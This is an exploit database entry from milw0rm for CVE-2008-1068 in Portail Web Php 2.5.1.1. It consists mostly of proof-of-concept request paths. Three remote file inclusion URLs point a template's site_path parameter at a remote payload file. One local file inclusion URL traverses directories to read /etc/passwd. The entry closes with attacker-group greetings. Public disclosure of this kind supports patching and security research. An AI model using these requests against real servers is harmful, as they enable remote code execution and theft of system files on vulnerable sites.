Portail Web Php <= 2.5.1.1 - Multiple Inclusion Vulnerabilities

2008-02-24T00:00:00
ID EDB-ID:5182
Type exploitdb
Reporter GoLd_M
Modified 2008-02-24T00:00:00

Description

Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities. CVE-2008-1068. Webapps exploit for php platform

                                        
                                            ### Portail Web Php &lt;= 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities
### http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar
### POC :
### I- Remote File Inclusion
### /PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
### /PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt
### II- Local File Inclusion
### /PwP2.5.1.1/?page=../../../../../../../../etc/passwd
### I'm Tryagi - Tryag.Cc/cc - Mahmood_ali  :) 

# milw0rm.com [2008-02-24]